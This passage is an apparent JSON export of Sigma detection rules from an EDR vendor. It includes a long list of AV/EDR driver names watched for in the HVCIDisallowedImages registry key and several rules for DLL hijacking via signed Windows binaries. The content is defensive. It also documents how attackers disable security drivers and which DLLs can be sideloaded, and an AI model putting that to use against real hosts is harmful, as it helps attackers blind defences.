SECURITY, Inc.\n - 'kmNWCH.sys'\n # IKARUS Security\n - 'Sonar.sys'\n # Immidio B.V.\n - 'immflex.sys'\n # in-soft Kft.\n - 'LmDriver.sys'\n # INCA Internet Co.\n - 'GKPFCB.sys'\n - 'GKPFCB64.sys'\n # INCA Internet Co.,Ltd.\n - 'TkPcFtCb.sys'\n - 'TkPcFtCb64.sys'\n # Industrial Technology\n - 'icrlmonitor.sys'\n # InfoCage\n - 'IccFilterSc.sys'\n # Informzaschita\n - 'SnDacs.sys'\n - 'SnExequota.sys'\n # Infotecs\n - 'filenamevalidator.sys'\n - 'KC3.sys'\n # InfoWatch\n - 'iwhlp2.sys'\n - 'iwhlpxp.sys'\n - 'iwhlp.sys'\n - 'iwdmfs.sys'\n # Initech Inc.\n - 'INISBDrv64.sys'\n # Int3 Software AB\n - 'equ8_helper.sys'\n # Intel Corporation\n - 'ielcp.sys'\n - 'IESlp.sys'\n - 'IntelCAS.sys'\n # Intercom Inc.\n - 'tsifilemon.sys'\n - 'MarSpy.sys'\n # Interset Inc.\n - 'WDCFilter.sys'\n # Intronis Inc\n - 'VHDTrack.sys'\n # Invincea\n - 'InvProtectDrv.sys'\n - 'InvProtectDrv64.sys'\n # Ionx Solutions LLP\n - 'AuditFlt.sys'\n # ioScience\n - 'iothorfs.sys'\n # iSecure Ltd.\n - 'isecureflt.sys'\n # ITsMine\n - 'imfilter.sys'\n # ITSTATION Inc\n - 'aUpDrv.sys'\n # Ivanti\n - 'IvAppMon.sys'\n # J's Communication Co.\n - 'RevoNetDriver.sys'\n # Jinfengshuntai\n - 'IPFilter.sys'\n # JiranData Co. Ltd\n - 'JDPPWF.sys'\n - 'JDPPSF.sys'\n # Jiransoft Co., Ltd\n - 'offsm.sys'\n - 'xkfsfd.sys'\n - 'JKPPOB.sys'\n - 'JKPPXK.sys'\n - 'JKPPPF.sys'\n - 'JKPPOK.sys'\n - 'pcpifd.sys'\n # k4solution Co.\n - 'zsfprt.sys'\n # Kalpataru\n - 'GPMiniFIlter.sys'\n # Kaspersky Lab\n - 'klboot.sys'\n - 'klfdefsf.sys'\n - 'klrsps.sys'\n - 'klsnsr.sys'\n - 'klifks.sys'\n - 'klifaa.sys'\n - 'Klifsm.sys'\n # KEBA AG\n - 'KeWF.sys'\n # Kenubi\n - 'boxifier.sys'\n # Keysight Technologies\n - 'KtFSFilter.sys'\n # kingsoft\n - 'Kisknl.sys'\n # KnowledgeTree Inc.\n - 'ktsyncfsflt.sys'\n # Koby Kahane\n - 'NpEtw.sys'\n # Ladislav Zezula\n - 'MSpy.sys'\n # LANDESK Software\n - 'LDSecDrv.sys'\n # Lenovo Beijing\n - 'slb_guard.sys'\n - 'lrtp.sys'\n # LINK co.\n - 'NetAccCtrl.sys'\n - 'NetAccCtrl64.sys'\n # Livedrive Internet Ltd\n - 'LivedriveFilter.sys'\n # Logichron Inc\n - 'CatMF.sys'\n # LogRhythm Inc.\n - 'LRAgentMF.sys'\n # Lovelace Network Tech\n - 'MPKernel.sys'\n # Lumension\n - 'eps.sys'\n # Magic Softworks, Inc.\n - 'MagicBackupMonitor.sys'\n # magrasoft Ltd\n - 'zqFilter.sys'\n # MailRu\n - 'mracdrv.sys'\n # Malwarebytes\n - 'mbamshuriken.sys'\n # Man Technology Inc\n - 'bsrfsflt.sys'\n - 'fsrfilter.sys'\n - 'vollock.sys'\n - 'drbdlock.sys'\n # ManageEngine Zoho\n - 'DFMFilter.sys'\n - 'DCFAFilter.sys'\n - 'RMPHVMonitor.sys'\n - 'FAPMonitor.sys'\n - 'MEARWFltDriver.sys'\n # ManTech\n - 'topdogfsfilt.sys'\n # March Hare Software Ltd\n - 'evscase.sys'\n - 'inuse.sys'\n - 'cvsflt.sys'\n # McAfee\n - 'mfencfilter.sys'\n # McAfee Inc.\n - 'mfeaskm.sys'\n # Micro Focus\n - 'FilrDriver.sys'\n # Microsoft\n - 'DhWatchdog.sys'\n - 'mssecflt.sys'\n - 'Backupreader.sys'\n - 'MsixPackagingToolMonitor.sys'\n - 'AppVMon.sys'\n - 'DpmFilter.sys'\n - 'Procmon11.sys'\n - 'minispy.sys'\n - 'fdrtrace.sys'\n - 'filetrace.sys'\n - 'uwfreg.sys'\n - 'uwfs.sys'\n - 'locksmith.sys'\n - 'winload.sys'\n - 'CbSampleDrv.sys'\n - 'simrep.sys'\n - 'change.sys'\n - 'delete_flt.sys'\n - 'SmbResilFilter.sys'\n - 'usbtest.sys'\n - 'NameChanger.sys'\n - 'failMount.sys'\n - 'failAttach.sys'\n - 'stest.sys'\n - 'cdo.sys'\n - 'ctx.sys'\n - 'fmm.sys'\n - 'cancelSafe.sys'\n - 'message.sys'\n - 'passThrough.sys'\n - 'nullFilter.sys'\n - 'ntest.sys'\n - 'iiscache.sys'\n - 'wrpfv.sys'\n - 'msnfsflt.sys'\n # MRY Inc.\n - 'drsfile.sys'\n # NanJing Geomarking\n - 'MagicProtect.sys'\n - 'cbfsfilter2020.sys'\n # NEC Corporation\n - 'UVMCIFSF.sys'\n # NEC Soft\n - 'flyfs.sys'\n - 'serfs.sys'\n - 'hdrfs.sys'\n # NEC System Technologies\n - 'IccFilterAudit.sys'\n # NEC System Technologies,Ltd.\n - 'ICFClientFlt.sys'\n - 'IccFileIoAd.sys'\n # Neowiz Corporation\n - 'MWatcher.sys'\n # NetIQ\n - 'CGWMF.sys'\n # NetLib\n - 'nlcbhelpx86.sys'\n - 'nlcbhelpx64.sys'\n - 'nlcbhelpi64.sys'\n # NetVision, Inc.\n - 'nvmon.sys'\n # Network Appliance\n - 'flashaccelfs.sys'\n - 'changelog.sys'\n # NetworkProfi Ltd\n - 'laFS.sys'\n # New Net Technologies Limited\n - 'NNTInfo.sys'\n # NewSoftwares.net,Inc.\n - 'WinFLAHdrv.sys'\n - 'WinFLAdrv.sys'\n - 'WinDBdrv.sys'\n - 'WinFLdrv.sys'\n - 'WinFPdrv.sys'\n # NEXON KOREA\n - 'BlackCat.sys'\n # NextLabs\n - 'nxrmflt.sys'\n # Niriva LLC\n - 'VHDDelta.sys'\n - 'FSTrace.sys'\n # Novell\n - 'zesfsmf.sys'\n # NTP Software\n - 'ntps_fa.sys'\n # Nurd Yazilim A.S.\n - 'edrdrv.sys'\n # NURILAB\n - 'pfracdrv.sys'\n - 'nrcomgrdki.sys'\n - 'nrcomgrdka.sys'\n - 'nrpmonki.sys'\n - 'nrpmonka.sys'\n - 'nravwka.sys'\n - 'bhkavki.sys'\n - 'bhkavka.sys'\n - 'docvmonk.sys'\n - 'docvmonk64.sys'\n # NVELO Inc.\n - 'SamsungRapidFSFltr.sys'\n # OCZ Storage\n - 'OczMiniFilter.sys'\n # OnGuard Systems LLC\n - 'NlxFF.sys'\n # OpenText Corp\n - 'enmon.sys'\n # OPSWAT Inc.\n - 'libwamf.sys'\n # ORANGE WERKS Inc\n - 'wgfile.sys'\n # PA File Sight\n - 'FileSightMF.sys'\n # Packeteer\n - 'mblmon.sys'\n # Palo Alto Networks\n - 'tedrdrv.sys'\n # PHD Virtual Tech Inc.\n - 'phdcbtdrv.sys'\n # PJSC KP VTI\n - 'RW7FsFlt.sys'\n # PolyLogyx LLC\n - 'vast.sys'\n # Positive Technologies\n - 'mpxmon.sys'\n # Protected Networks\n - 'minitrc.sys'\n # Qihoo 360\n - '360box.sys'\n # Qingdao Ruanmei Network Technology Co.\n - 'RMDiskMon.sys'\n - 'diskactmon.sys'\n # Quality Corporation\n - 'qfmon.sys'\n # Qualys Inc.\n - 'QMON.sys'\n - 'qfimdvr.sys'\n # Quantum Corporation.\n - 'cvofflineFlt32.sys'\n - 'cvofflineFlt64.sys'\n # Quest Software\n - 'QFAPFlt.sys'\n # Quest Software Inc.\n - 'BWFSDrv.sys'\n - 'CAADFlt.sys'\n # Quick Heal Technologies Pvt. Ltd.\n - 'sieflt.sys'\n - 'cssdlp.sys'\n - 'fam.sys'\n # Quorum Labs\n - 'qfilter.sys'\n # Rackware\n - 'rwchangedrv.sys'\n # Redstor Limited\n - 'RsFlt.sys'\n # RES Software\n - 'FileGuard.sys'\n - 'NetGuard.sys'\n - 'RegGuard.sys'\n - 'ImgGuard.sys'\n - 'AppGuard.sys'\n # Resplendence Software Projects\n - 'mmPsy32.sys'\n - 'mmPsy64.sys'\n - 'rrMon32.sys'\n - 'rrMon64.sys'\n # rhipe Australia Pty\n - 'SeRdr.sys'\n # Rubrik Inc\n - 'RubrikFileAudit.sys'\n - 'FileSystemCBT.sys'\n # rubysoft\n - 'IronGateFD.sys'\n # RuiGuard Ltd\n - 'RuiMinispy.sys'\n - 'RuiFileAccess.sys'\n - 'RuiEye.sys'\n - 'RuiMachine.sys'\n - 'RuiDiskFs.sys'\n # RUNEXY\n - 'ruaff.sys'\n - 'mlsaff.sys'\n # SAFE-Cyberdefense\n - 'SAFE-Agent.sys'\n # Safend\n - 'Sahara.sys'\n - 'Santa.sys'\n # SaferZone Co.\n - 'SZEDRDrv.sys'\n - 'szardrv.sys'\n - 'szpcmdrv.sys'\n - 'szdfmdrv.sys'\n - 'szdfmdrv_usb.sys'\n - 'sprtdrv.sys'\n # Samsung SDS Ltd\n - 'SGResFlt.sys'\n # SanDisk Inc.\n - 'fiopolicyfilter.sys'\n # Sandoll Communication\n - 'SfdFilter.sys'\n # SC ODEKIN SOLUTIONS SRL\n - 'ospmon.sys'\n # Scalable Software Inc.\n - 'PkgFilter.sys'\n # ScriptLogic\n - 'FSAFilter.sys'\n # Secdo\n - 'SecdoDriver.sys'\n # SecureAxis\n - 'usbl_ifsfltr.sys'\n # SecureAxis Software\n - 'llfilter.sys'\n # Secured Globe Inc.\n - 'fltRs329.sys'\n # Security Code LLC\n - 'ScAuthFSFlt.sys'\n - 'ScAuthIoDrv.sys'\n # SentinelOne\n - 'SentinelMonitor.sys'\n # Sevtechnotrans\n - 'uamflt.sys'\n # Shanghai YiCun Network Tech Co. Ltd\n - 'AccessValidator.sys'\n # SharpCrafters\n - 'psisolator.sys'\n # SheedSoft Ltd\n - 'SheedSelfProtection.sys'\n # SheedSoft Ltd.\n - 'arta.sys'\n # Shenzhen CloudRiver\n - 'CrUnCopy.sys'\n # SHENZHEN UNNOO Information Techco.\n - 'RyGuard.sys'\n - 'FileShareMon.sys'\n - 'ryfilter.sys'\n # Shenzhen Unnoo LTD\n - 'secufile.sys'\n - 'XiaobaiFs.sys'\n - 'XiaobaiFsR.sys'\n # ShinNihonSystec Co\n - 'sagntflt.sys'\n # Simopro Technology\n - 'CbFltFs4.sys'\n # SK Infosec Co\n - 'PLPOffDrv.sys'\n - 'ISFPDrv.sys'\n - 'ionmonwdrv.sys'\n # Sky Co., LTD.\n - 'SkyRGDrv.sys'\n - 'SkyAMDrv.sys'\n # Sky Co.,Ltd.\n - 'SkyWPDrv.sys'\n # SmartFile LLC\n - 'FileHubAgent.sys'\n # SMTechnology Co.\n - 'storagedrv.sys'\n # SN Systems Ltd\n - 'cbfilter20.sys'\n - 'cbfsfilter2017.sys'\n # SnoopWall LLC\n - 'SWCommFltr.sys'\n # SODATSW\n - 'sodatpfl.sys'\n - 'fcontrol.sys'\n # SoftCamp Co.\n - 'scred.sys'\n # Softnext Technologies\n - 'snimg.sys'\n # SoftPerfect Research\n - 'fsnk.sys'\n # Software Pursuits Inc.\n - 'SPIMiniFilter.sys'\n # Sogou Ltd.\n - 'SCAegis.sys'\n # Solarwinds LLC\n - 'SWFsFltrv2.sys'\n - 'SWFsFltr.sys'\n # Soliton Systems\n - 'it2reg.sys'\n - 'it2drv.sys'\n - 'solitkm.sys'\n # Soliton Systems K.K.\n - 'SDVFilter.sys'\n # Solusseum Inc\n - 'Sefo.sys'\n # Soluto LTD\n - 'PDGenFam.sys'\n # Somma Inc\n - 'MonsterK.sys'\n # SonicWall Inc\n - 'SFPMonitor.sys'\n # Sophos\n - 'SophosED.sys'\n # Sophos Plc\n - 'soidriver.sys'\n # SoulFrost\n - 'sfac.sys'\n # SPEKNET EOOD\n - 'Asgard.sys'\n # Spharsoft Technologies\n - 'SvCBT.sys'\n # Squadra Technologies\n - 'secRMM.sys'\n # Stegosystems Inc\n - 'StegoProtect.sys'\n # StorageCraft Tech\n - 'stcvsm.sys'\n # Stormshield\n - 'EsProbe.sys'\n # Sumitomo Electric Ltd.\n - 'MCFileMon64.sys'\n - 'MCFileMon32.sys'\n # Sun&Moon Rise\n - 'ntfsf.sys'\n # Symantec\n - 'pgpwdefs.sys'\n - 'GEProtection.sys'\n - 'sysMon.sys'\n - 'ssrfsf.sys'\n - 'emxdrv2.sys'\n - 'reghook.sys'\n - 'spbbcdrv.sys'\n - 'bhdrvx86.sys'\n - 'bhdrvx64.sys'\n - 'SISIPSFileFilter'\n - 'symevent.sys'\n # Symantec Corp.\n - 'diflt.sys'\n # Syncopate\n - 'thetta.sys'\n # Systemneeds, Inc\n - 'Snilog.sys'\n # TaaSera Inc.\n - 'AwareCore.sys'\n # Tanium\n - 'TaniumRecorderDrv.sys'\n # TCXA Ltd.\n - 'fcnotify.sys'\n # Tech Research\n - 'FASDriver'\n # TechnoKom Ltd.\n - 'agfsmon.sys'\n # Telefnica Digital\n - 'path8flt.sys'\n # Temasoft S.R.L.\n - 'filemon.sys'\n # Tencent (Shenzhen)\n - 'QQProtect.sys'\n - 'QQProtectX64.sys'\n # Tencent Technology\n - 'TenRSafe2.sys'\n - 'tesxporter.sys'\n - 'tesxnginx.sys'\n # Tetraglyph Technologies\n - 'TGFSMF.sys'\n # ThinAir Labs Inc\n - 'taobserveflt.sys'\n # ThinScale Tech\n - 'TSTFsReDir.sys'\n - 'TSTRegReDir.sys'\n - 'TSTFilter.sys'\n # Third Brigade\n - 'tbfsfilt.sys'\n # Threat Stack\n - 'ThreatStackFIM.sys'\n # Tiversa Inc\n - 'tss.sys'\n # Topology Ltd\n - 'dsfemon.sys'\n # Tranxition Corp\n - 'regmonex.sys'\n - 'TXRegMon.sys'\n # Trend Micro Inc.\n - 'TMUMS.sys'\n - 'hfileflt.sys'\n - 'TMUMH.sys'\n # Trend Micro, Inc.\n - 'AcDriver.sys'\n - 'SakFile.sys'\n - 'SakMFile.sys'\n # Tritium Inc.\n - 'Tritiumfltr.sys'\n # Trustware Ltd\n - 'Redlight.sys'\n # Trustwave\n - 'TWBDCFilter.sys'\n # UpGuard\n - 'UpGuardRealTime.sys'\n # Varlook Ltd.\n - 'varpffmon.sys'\n # Varonis Ltd\n - 'VrnsFilter.sys'\n # Veramine Inc\n - 'phantomd.sys'\n # Vidder Inc.\n - 'vidderfs.sys'\n # Viewfinity\n - 'vfdrv.sys'\n # Vision Solutions\n - 'repdrv.sys'\n - 'repmon.sys'\n # VMware, Inc.\n - 'VMWVvpfsd.sys'\n - 'RTOLogon.sys'\n # VoodooSoft\n - 'VSScanner.sys'\n # WaikatoLink Ltd\n - 'proggerdriver.sys'\n # WardWiz\n - 'WRDWIZFILEPROT.SYS'\n - 'WRDWIZREGPROT.SYS'\n # Warp Disk Software\n - 'DsDriver.sys'\n # Weing Co.,Ltd.\n - 'pscff.sys'\n # Wellbia.com\n - 'xhunter64.sys'\n - 'uncheater.sys'\n # Wellbiacom\n - 'xhunter1.sys'\n # Whitebox Security\n - 'wbfilter.sys'\n # WhiteCell Software Inc.\n - 'EGMinFlt.sys'\n # WidgetNuri Corp\n - 'wsafefilter.sys'\n - 'RansomDetect.sys'\n # Winicssec Ltd\n - 'wlminisecmod.sys'\n - 'WntGPDrv.sys'\n # X-Cloud Systems\n - 'xcpl.sys'\n # Xacti\n - 'stflt.sys'\n # Yahoo Japan Corporation\n - 'YahooStorage.sys'\n # Yandex LLC\n - 'bmregdrv.sys'\n - 'bmfsdrv.sys'\n # YATEM Co. Ltd.\n - 'LCmPrintMon.sys'\n - 'LCgAdMon.sys'\n - 'LCmAdMon.sys'\n - 'LCgFileMon.sys'\n - 'LCmFile.sys'\n - 'LCgFile.sys'\n - 'LCmFileMon.sys'\n # Yokogawa Corpration\n - 'YFSD2.sys'\n # Yokogawa R&L Corp\n - 'YFSDR.SYS'\n - 'YFSD.SYS'\n - 'YFSRD.sys'\n - 'psgfoctrl.sys'\n - 'psgdflt.sys'\n # Zampit\n - 'zampit_ml.sys'\n # ZenmuTech Inc.\n - 'mumdi.sys'\n # Zhuan Zhuan Jing Shen\n - 'zzpensys.sys'\n # ZoneFox\n - 'KernelAgent32.sys'\n #\n # FSFilter Activity Monitor - END\n #\n #\n # Invoke-EDRCheck.ps1 - BEGIN\n # Duplicates from previous source are removed.\n #\n # Altiris Symantec\n - 'atrsdfw.sys'\n # Avast\n - 'naswSP.sys'\n # Carbon Black\n - 'CbELAM.sys'\n - 'ctifile.sys'\n - 'ctinet.sys'\n - 'parity.sys'\n # Cisco\n - 'csacentr.sys'\n - 'csaenh.sys'\n - 'csareg.sys'\n - 'csascr.sys'\n # CJSC Returnil Software\n - 'rvsavd.sys'\n # Comodo Security\n - 'CmdMnEfs.sys'\n - 'MyDLPMF.sys'\n # CrowdStrike\n - 'im.sys'\n - 'CSDeviceControl.sys'\n - 'CSFirmwareAnalysis.sys'\n # Cybereason\n - 'CRExecPrev.sys'\n # Endgame\n - 'esensor.sys'\n # ESET\n - 'edevmon.sys'\n # F-Secure\n - 'xfsgk.sys'\n # HarfangLab ! :)\n - 'hlprotect.sys'\n # Malwarebytes\n - 'mbamwatchdog.sys'\n # Microsoft Defender\n - 'MpKslDrv.sys'\n # Palo Alto Networks - Cortex XDR\n - 'cyverak.sys'\n - 'cyvrlpc.sys'\n - 'cyvrmtgn.sys'\n - 'tdevflt.sys'\n # Raytheon Cyber Solutions\n - 'eaw.sys'\n # Symantec\n - 'vxfsrep.sys'\n - 'VirtFile.sys'\n - 'SymAFR.sys'\n - 'symefasi.sys'\n - 'symefa.sys'\n - 'symefa64.sys'\n - 'SymHsm.sys'\n - 'evmf.sys'\n - 'GEFCMP.sys'\n - 'VFSEnc.sys'\n - 'pgpfs.sys'\n - 'fencry.sys'\n - 'symrg.sys'\n # Verdasys Inc\n - 'ndgdmk.sys'\n # Tehtris\n - 'egfilterk.sys'\n # Sophos\n - 'SophosDt2.sys'\n - 'SophosSupport.sys'\n # Cisco AMP\n - 'ExPrevDriver.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48fe9f11-44de-4b4b-807c-00bb14c3058b",
"rule_name": "EDR/AV Driver added to HVCI Disallowed Images in Registry",
"rule_description": "Detects common AV or EDR driver names being written into the HVCIDisallowedImages registry key. This feature will only take effect on the next machine reboot.\nHVCI (Hypervisor Enforced Code Integrity) is a Windows mechanism that contains an undocumented feature that allows to register an array of driver names to be blocked.\nAttackers can use this feature to disable security products by blocking their respective drivers.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2023-06-13",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "492d7132-a7e9-44bb-9a91-39bac44a9e1d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082179Z",
"creation_date": "2026-03-23T11:45:34.082181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winver.yml",
"content": "title: DLL Hijacking via WINVER.exe\nid: 492d7132-a7e9-44bb-9a91-39bac44a9e1d\ndescription: |\n Detects potential Windows DLL Hijacking via WINVER.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WINVER.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "492d7132-a7e9-44bb-9a91-39bac44a9e1d",
"rule_name": "DLL Hijacking via WINVER.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WINVER.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "494a754b-5e46-4cc1-aa3a-fc93a3fdd2f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588648Z",
"creation_date": "2026-03-23T11:45:34.588652Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588659Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wextract.yml",
"content": "title: DLL Hijacking via wextract.exe\nid: 494a754b-5e46-4cc1-aa3a-fc93a3fdd2f0\ndescription: |\n Detects potential Windows DLL Hijacking via wextract.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wextract.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "494a754b-5e46-4cc1-aa3a-fc93a3fdd2f0",
"rule_name": "DLL Hijacking via wextract.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wextract.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4956a3c7-a3ae-4f77-8867-d59afb6ba420",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591526Z",
"creation_date": "2026-03-23T11:45:34.591530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591538Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mspaint.yml",
"content": "title: DLL Hijacking via mspaint.exe\nid: 4956a3c7-a3ae-4f77-8867-d59afb6ba420\ndescription: |\n Detects potential Windows DLL Hijacking via mspaint.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mspaint.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\MSFTEDIT.DLL'\n - '\\PROPSYS.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 